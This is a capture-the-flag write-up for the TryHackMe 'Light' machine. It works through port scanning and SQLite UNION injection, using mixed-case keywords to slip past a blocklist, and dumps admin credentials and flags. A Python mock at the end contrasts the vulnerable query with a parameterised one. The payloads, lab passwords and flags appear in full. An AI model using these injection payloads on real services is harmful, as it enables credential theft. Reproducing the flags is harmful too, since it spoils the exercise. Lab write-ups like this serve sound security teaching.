TryHackMe - Light
Light
Test your enumeration skills on this boot-to-root machine.
About
Welcome to the Light database application!
I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.
Enumeration
Rustscan
rustscan -a 10.10.174.222
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.
[~] The config file is expected to be at "/Users/manavallan/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.174.222:22
Open 10.10.174.222:1337
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 21:16 IST
Initiating Ping Scan at 21:16
Scanning 10.10.174.222 [2 ports]
Completed Ping Scan at 21:16, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:16
Scanning 10.10.174.222 [2 ports]
Discovered open port 1337/tcp on 10.10.174.222
Discovered open port 22/tcp on 10.10.174.222
Completed Connect Scan at 21:16, 0.15s elapsed (2 total ports)
Nmap scan report for 10.10.174.222
Host is up, received conn-refused (0.15s latency).
Scanned at 2025-01-23 21:16:10 IST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
1337/tcp open waste syn-ack
Read data files from: /opt/homebrew/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
nmap
nmap -sC -sV -p1337 10.10.227.218
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-28 19:42 IST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:02:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.227.218
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Welcome to the Light database!
| Please enter your username:
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest:
| Welcome to the Light database!
| Please enter your username: Username not found.
|_ Please enter your username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.63 seconds
nc - Netcat
nc 10.10.174.222 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Trying Bruteforce - Python/Bash Script
For a long time I was writing a Python/Bash script to automate reading the nc output and inputting the username, but I couldn't get it to work. Then, since it is a database, I started trying some SQLi (I'm pretty new to manual SQLi testing). So let's learn together. This is where what I learned about SQLi on THM comes into play.
SQLi
Validating SQLi
Please enter your username: ' OR '1'='1
Password: tF8tj2o94WE4LKC
Please enter your username: ' or 1=1 limit 1 --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1 UNION SELECT 1
Ahh there is a word in there I don't like :(
Please enter your username: '%20or%20'1'='1
Error: unrecognized token: "20or"
Please enter your username: ' or 'SLEEP(5)
Username not found.
So the program blocks -- (comments), SELECT and UNION, so I need to find an alternative way to inject.
After some time of grinding found this:
Please enter your username: 1' UnIoN SeLeCt '1
Password: 1
I tried multiple payloads, but none seemed to get me the table name or schema.
Please enter your username: 'UnIoN SeLeCt * FrOm information_schema.tables'
Error: no such table: information_schema.tables
Next I found the SQL version using this query:
'Union Select sqlite_version()'
Please enter your username: 'Union Select sqlite_version()'
Password: 3.31.1
This list of payloads was very much helpful for me: SQLi Payloads Link
'Union Select sql FROM sqlite_master'
Please enter your username: 'Union Select sql FROM sqlite_master'
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
So the table name is admintable and its columns are id, username and password.
Finally, the query we need:
nc 10.10.227.218 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: 'Union Select username from admintable'
Password: TryHackMeAdmin
Flag 1: TryHackMeAdmin
I honestly didn't think I would get flag 3; I expected to receive flag 2, which is the password. But lucky me :)
Please enter your username: ' Union Select password from admintable'
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Flag 3: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Now let’s find a way to get the password of TryHackMeAdmin
This didn't work: ' Union Select password from admintable where username="TryHackMeAdmin"'
After struggling for some time, I wondered whether I had missed a table name, so I took a step back and analysed my sqlite_master queries:
'Union Select group_concat(sql) FROM sqlite_master'
group_concat(): a SQLite aggregate function that concatenates values from multiple rows into a single string, separated by a comma by default. It is often used to collapse many rows into one result.
In the context of this query, group_concat(sql) takes every entry of the sql column in the sqlite_master table and concatenates them into one string, so every table definition stored there is printed in the output:
Please enter your username: 'Union Select group_concat(sql) FROM sqlite_master'
Password: CREATE TABLE usertable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER),CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
So now I have found another table, usertable. Let's try the commands we used earlier against it.
Rabbithole
Please enter your username: 'Union Select username from usertable'
Password: alice
Please enter your username: alice
Password: tF8tj2o94WE4LKC
But what if we use group_concat to pull the whole contents of admintable at once? The final payload, crafted with the help of ChatGPT, is:
' Union Select group_concat(username || ":" || password) FROM admintable'
Please enter your username: ' Union Select group_concat(username || ":" || password) FROM admintable'
Password: TryHackMeAdmin:mamZtAuMlrsEy5bp6q17,flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Finally got it…
Flag 2: mamZtAuMlrsEy5bp6q17
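As an added example (not part of the original writeup, and not the Light application's own code, which is never shown), the following Python mock reproduces the behaviour seen above: a case-sensitive keyword blocklist in front of a string-built SQLite query, which the mixed-case UNION payload and the group_concat enumeration defeat, next to a parameterised query that treats the same input as plain data. The schema, rows and query shape are assumptions reconstructed from the session output; the payload uses ':' instead of ":" and a WHERE tail so it does not rely on SQLite's double-quoted-string fallback.

```python
import sqlite3

# Constructed in-memory copy of the schema and rows the writeup recovered.
# The real query shape is an assumption based on the service's responses.
SCHEMA = """
CREATE TABLE usertable  (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
INSERT INTO usertable (username, password) VALUES
    ('smokey', 'vYQ5ngPpw8AdUmL'), ('alice', 'tF8tj2o94WE4LKC');
INSERT INTO admintable (username, password) VALUES
    ('TryHackMeAdmin', 'mamZtAuMlrsEy5bp6q17'),
    ('flag', 'THM{SQLit3_InJ3cTion_is_SimplE_nO?}');
"""

# Case-sensitive blocklist, matching what the writeup observed (assumed implementation).
BLOCKED = ("--", "/*", "%0b", "SELECT", "UNION")


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, username):
    """String-built query behind a keyword blocklist: the writeup's attack surface."""
    if any(tok in username for tok in BLOCKED):
        return "Ahh there is a word in there I don't like :("
    query = f"SELECT password FROM usertable WHERE username = '{username}'"
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error as e:          # e.g. "unrecognized token" from a broken payload
        return f"Error: {e}"
    return str(row[0]) if row else "Username not found."


def lookup_safe(con, username):
    """Parameterised query: the input can never change the statement's structure."""
    row = con.execute(
        "SELECT password FROM usertable WHERE username = ?", (username,)
    ).fetchone()
    return str(row[0]) if row else "Username not found."


if __name__ == "__main__":
    db = open_db()
    # Mixed case slips past the blocklist; the parameterised version just sees a username.
    payload = "' UnIoN SeLeCt group_concat(username || ':' || password) FrOm admintable WHERE '1'='1"
    print(lookup_vulnerable(db, payload))   # admin rows leak
    print(lookup_safe(db, payload))         # Username not found.
```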
Thanks for reading!